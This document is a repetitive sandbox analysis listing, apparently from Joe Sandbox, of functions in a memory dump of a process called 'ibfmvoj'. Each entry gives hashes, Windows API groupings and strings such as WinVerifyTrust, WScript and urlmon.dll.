                                                                                                                                                • Instruction ID: 2e31ccf681b37b832cb135f652c889f945b14d70d9c318a8f52cdcd58282b827
                                                                                                                                                • Opcode Fuzzy Hash: 5cf0ade7f280740e5f0efe1e6f24d2458c7bbc4dcc6469048af84908b933bf4f
                                                                                                                                                • Instruction Fuzzy Hash: 36617122B09A4295EB11EF25DC406A9A3B0FF44BA8F944135DE4E87BA4DF3CF515C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastmemset$AddressFreeLibraryProc
                                                                                                                                                • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                • API String ID: 2451772358-2991032369
                                                                                                                                                • Opcode ID: 269f55e51722e6f0d9cdf45d9cd32dbfa92726a59ea72221d2bff7cffb17ffe0
                                                                                                                                                • Instruction ID: 2071f8721701882bcdecd0807ad0a91d58b78568b39439bc8d75fd849347758f
                                                                                                                                                • Opcode Fuzzy Hash: 269f55e51722e6f0d9cdf45d9cd32dbfa92726a59ea72221d2bff7cffb17ffe0
                                                                                                                                                • Instruction Fuzzy Hash: F1517E72B08B428AF711EF75D8403ADA3A1BB48768F804135DE0AD6B48DF7CE519C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Free$AllocClearVariant
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2934074361-0
                                                                                                                                                • Opcode ID: 621877a8cd31627654a6532bc4368b19cc2a0c9914f9bc73eb7a744b8d95f29f
                                                                                                                                                • Instruction ID: d25e480b3b1af4f9e8abb3afab12f337b985b482f7f803234224002db0db697a
                                                                                                                                                • Opcode Fuzzy Hash: 621877a8cd31627654a6532bc4368b19cc2a0c9914f9bc73eb7a744b8d95f29f
                                                                                                                                                • Instruction Fuzzy Hash: 5EC17136B08A4286EB10EF65D8501ACB371FB88BA8B904135DE1E97794DF39F559C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$AllocFree$CriticalLeaveSection
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754475248-0
                                                                                                                                                • Opcode ID: 5f9a81f22091c35c80351703c43142c8756230b5411ad9b6aeec3762bd592d2e
                                                                                                                                                • Instruction ID: ec47b6ac0534df44f4593c28792b369181379a9edd325d15faf14a3a2f878ab1
                                                                                                                                                • Opcode Fuzzy Hash: 5f9a81f22091c35c80351703c43142c8756230b5411ad9b6aeec3762bd592d2e
                                                                                                                                                • Instruction Fuzzy Hash: 6F312F36E15B5696DA05EF16A940029B3A4FB88FA0B940435DF4E87B54EF3CF462C7E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$AllocFree$??3@_malloc_dbgmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 612691619-0
                                                                                                                                                • Opcode ID: 457bcfb5f54c50030ed694868103fc0455fb9366be79bb5f7e913c49e0c9a23f
                                                                                                                                                • Instruction ID: cab102ed32384e0fcefcdd13950f4f7f0b79e10cc641628a254b5cfb3654c61c
                                                                                                                                                • Opcode Fuzzy Hash: 457bcfb5f54c50030ed694868103fc0455fb9366be79bb5f7e913c49e0c9a23f
                                                                                                                                                • Instruction Fuzzy Hash: 4C214121A09B5296EB55EF22A84023CA3B0EF44FB4F840434DA4F83745EF3CF45287A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$AllocFree$??3@_malloc_dbgmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 612691619-0
                                                                                                                                                • Opcode ID: bdff5e16ec6d953d08013135ee1635a96b1522a39afa9bc39ee011d4bc740ed8
                                                                                                                                                • Instruction ID: 09a30c31b3cbc4bffa568580bf1bbf6003b9e596577330e77470a596bed6c9ac
                                                                                                                                                • Opcode Fuzzy Hash: bdff5e16ec6d953d08013135ee1635a96b1522a39afa9bc39ee011d4bc740ed8
                                                                                                                                                • Instruction Fuzzy Hash: 81211021E09B5296EB55EF26A89013DA3B0EF44FB0F944434D90F86B45DF3CF45186A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                • String ID: WScript_OnScriptTerminate
                                                                                                                                                • API String ID: 986138563-526745235
                                                                                                                                                • Opcode ID: d1c6a9427b429854884164cfe1c7cdabe57998c50c27a6d10440de56b74aad2b
                                                                                                                                                • Instruction ID: efad1d900fd8028813f80f4648453a4d1f45ac2889a402b9317027419cb07f49
                                                                                                                                                • Opcode Fuzzy Hash: d1c6a9427b429854884164cfe1c7cdabe57998c50c27a6d10440de56b74aad2b
                                                                                                                                                • Instruction Fuzzy Hash: 0BC16276B08B4586EB11EF66D8801ADB771FB48BA8B504036CE0E97B64DF78F459C390
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ArraySafe$AllocClearCreateElementStringVariant$_malloc_dbg
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1334244730-0
                                                                                                                                                • Opcode ID: 447acff4cbaa45d1c87a1a9c741093bf58d3103773243910f389adb2559fd00c
                                                                                                                                                • Instruction ID: 9989c3f11a244c1ce7bbb2cd8004acfb6dafb33e67c51c8c6e2191db736d64d0
                                                                                                                                                • Opcode Fuzzy Hash: 447acff4cbaa45d1c87a1a9c741093bf58d3103773243910f389adb2559fd00c
                                                                                                                                                • Instruction Fuzzy Hash: EC818D32A1476296EB15EF55D8401ADA7B4FB08BB4F944435CE0E93B50EF38F965C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeMessage$CloseFilterHandleRegisterString$LibraryPost
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2505060138-0
                                                                                                                                                • Opcode ID: cfb5e8e42cfbdb510ee04b7ec1e11e4ab66f9a186bda1c6afec1fb275568dd6c
                                                                                                                                                • Instruction ID: b5850d75fc08f740a4fde3c3c0042a2b20297882d610b57781e7c011be811e46
                                                                                                                                                • Opcode Fuzzy Hash: cfb5e8e42cfbdb510ee04b7ec1e11e4ab66f9a186bda1c6afec1fb275568dd6c
                                                                                                                                                • Instruction Fuzzy Hash: 88712826719B9582EE49EF25D994268A364FF84FA0F484536CA1F83B60CF38F465C360
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeString$HeapLocalMessage$ActiveAllocErrorFormatLastLoadProcessWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1277942935-0
                                                                                                                                                • Opcode ID: fffda8997a2d5a8440ecd5c016cff23b5f10bebc83455b02508e63b3bebb8427
                                                                                                                                                • Instruction ID: fbb251b40d5f1e5188aa8879f58add6ed69ba0923eff1ef018962c34f44126a0
                                                                                                                                                • Opcode Fuzzy Hash: fffda8997a2d5a8440ecd5c016cff23b5f10bebc83455b02508e63b3bebb8427
                                                                                                                                                • Instruction Fuzzy Hash: 4F417062F18A1295FB11EF61DD401BDA771BF44BA4F844035DE0E97B58EF38A45683A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeString
                                                                                                                                                • String ID: WScript_OnScriptTerminate
                                                                                                                                                • API String ID: 3341692771-526745235
                                                                                                                                                • Opcode ID: 7b5772277f4ba1f20c59476304da94783dd31d316957cf6344288223532e7827
                                                                                                                                                • Instruction ID: a0ab7da16af3eeeadd9a9c001e0ec02bb190c52d1c4ab171f67f6c7c3d56d7ed
                                                                                                                                                • Opcode Fuzzy Hash: 7b5772277f4ba1f20c59476304da94783dd31d316957cf6344288223532e7827
                                                                                                                                                • Instruction Fuzzy Hash: 77814E32B08B5686E711DF65D8801ADB3B0FB48BA8F500536DE4E93B68DF78E455C790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DirectoryErrorLastSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3081803543-0
                                                                                                                                                • Opcode ID: 7a6bc62256a5c0d23d4b35ba05489be1f19e2a1138f4017b1588562ef060e3a7
                                                                                                                                                • Instruction ID: 104b6cf59d5d6d247da78f9235990ef828adaabda74c9e229acc3e20c312c2d4
                                                                                                                                                • Opcode Fuzzy Hash: 7a6bc62256a5c0d23d4b35ba05489be1f19e2a1138f4017b1588562ef060e3a7
                                                                                                                                                • Instruction Fuzzy Hash: 3C217521B08A4246E701EF65AC40379A6E5AF84BB0F944635CA4FC67D4EF3CB95682A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpen
                                                                                                                                                • String ID: ScriptEngine$Shell
                                                                                                                                                • API String ID: 47109696-1851718235
                                                                                                                                                • Opcode ID: 09cbf8bc278e6ce95fe13d24c3d7e1b7f77f273cb609e67cf790a2f640d49d34
                                                                                                                                                • Instruction ID: 83d4d02bb42e05919e51f4ee85e1ee1cb5ac0b20b04e8d3e5ce08b445cf7bbe1
                                                                                                                                                • Opcode Fuzzy Hash: 09cbf8bc278e6ce95fe13d24c3d7e1b7f77f273cb609e67cf790a2f640d49d34
                                                                                                                                                • Instruction Fuzzy Hash: 8D219331B58B5285F700EF66ED4062AA2A1EB84BE0F904131EE5EC7B54DF2CF841C790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeString$??3@ArrayDestroySafe
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3740040915-0
                                                                                                                                                • Opcode ID: 16f3eab80ef4dacb5231b29a6cc046dfb4d9c14c12fe641159d648035459e9b3
                                                                                                                                                • Instruction ID: 095bbdd11a1c372cd5ec41366149b7ea899e27c5da338ade046e676211beceb3
                                                                                                                                                • Opcode Fuzzy Hash: 16f3eab80ef4dacb5231b29a6cc046dfb4d9c14c12fe641159d648035459e9b3
                                                                                                                                                • Instruction Fuzzy Hash: 1B312A36A09B0185EA06EF15E990278B374FF44FA0B944435DA5F83B64DF2CF4A5C3A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue_wcsnicmp
                                                                                                                                                • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                                                                                                                • API String ID: 2262609651-1161606707
                                                                                                                                                • Opcode ID: 541c0b2b4d560e94bb94dfee6909b568592f080552c435190cef48e6c380e065
                                                                                                                                                • Instruction ID: af62b97c33feb923b07b982d4eb6c20d452494045e6d8d65b3028a4ac7a99ce5
                                                                                                                                                • Opcode Fuzzy Hash: 541c0b2b4d560e94bb94dfee6909b568592f080552c435190cef48e6c380e065
                                                                                                                                                • Instruction Fuzzy Hash: BE318F31A18B0281EB11EF55E84466AB3A5FF48BA0FD04135EA9E83B54DF3CF565C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCreateErrorFileLastLibraryLoadMonikerProc
                                                                                                                                                • String ID: CreateURLMonikerEx$urlmon.dll
                                                                                                                                                • API String ID: 618665799-3151727589
                                                                                                                                                • Opcode ID: 2c6acf82c92bc204260e3ef2635251f6082680815dbc070a751a038f35cb3923
                                                                                                                                                • Instruction ID: c5422cea6a239ae0e3ff4c514af863c148f76e920937fdb5d449caa4490b9604
                                                                                                                                                • Opcode Fuzzy Hash: 2c6acf82c92bc204260e3ef2635251f6082680815dbc070a751a038f35cb3923
                                                                                                                                                • Instruction Fuzzy Hash: A6110A24B0D75381FB46EF55AC54275A2A4EF08BA4F944039C84FC67A0EF2DB86582B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$ClearString$ArrayElementInitSafe
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 598207039-0
                                                                                                                                                • Opcode ID: fc6accf0ca07252a161a9e0eeccae8e2b3bdb484962d130f295bf7465759c3a7
                                                                                                                                                • Instruction ID: ba0de9b61f9060b249e88edcdba3f081bf55c1e41651bdefa1967992ca1f1e17
                                                                                                                                                • Opcode Fuzzy Hash: fc6accf0ca07252a161a9e0eeccae8e2b3bdb484962d130f295bf7465759c3a7
                                                                                                                                                • Instruction Fuzzy Hash: 8721A432B146569AEB15EF75DC901AC67A0FB48BB4B400131DE1FC3B94EF38E45587A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1262414356-0
                                                                                                                                                • Opcode ID: a8ea74e203072a946b60277a75e21a3c64d52ca64d2564570eecd41b789403e6
                                                                                                                                                • Instruction ID: ab9422f826e6f54c5fb3cfdd543eb2fb46f676e15cc04cdcfe96ddc747953043
                                                                                                                                                • Opcode Fuzzy Hash: a8ea74e203072a946b60277a75e21a3c64d52ca64d2564570eecd41b789403e6
                                                                                                                                                • Instruction Fuzzy Hash: 3211C331B18B5282E761EF15ED04629E661AB84FF0F988235CA1A83F94CF3CB4628750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeString$Thread$CriticalCurrentDeleteMessagePostSection
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1408622836-0
                                                                                                                                                • Opcode ID: a520bd929c661e741c0b713eee506af4929aee8b9f0700b317503e5ccd92e35e
                                                                                                                                                • Instruction ID: 3b2f81c7a75ae5f7b25fa3e6daa7866f55a14c7dc26859f224950e9e26f91db0
                                                                                                                                                • Opcode Fuzzy Hash: a520bd929c661e741c0b713eee506af4929aee8b9f0700b317503e5ccd92e35e
                                                                                                                                                • Instruction Fuzzy Hash: E721FF76A09A4292EB56EF65DC94128A370FF88F65B944431CA0F83764CF3CE456C3A4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
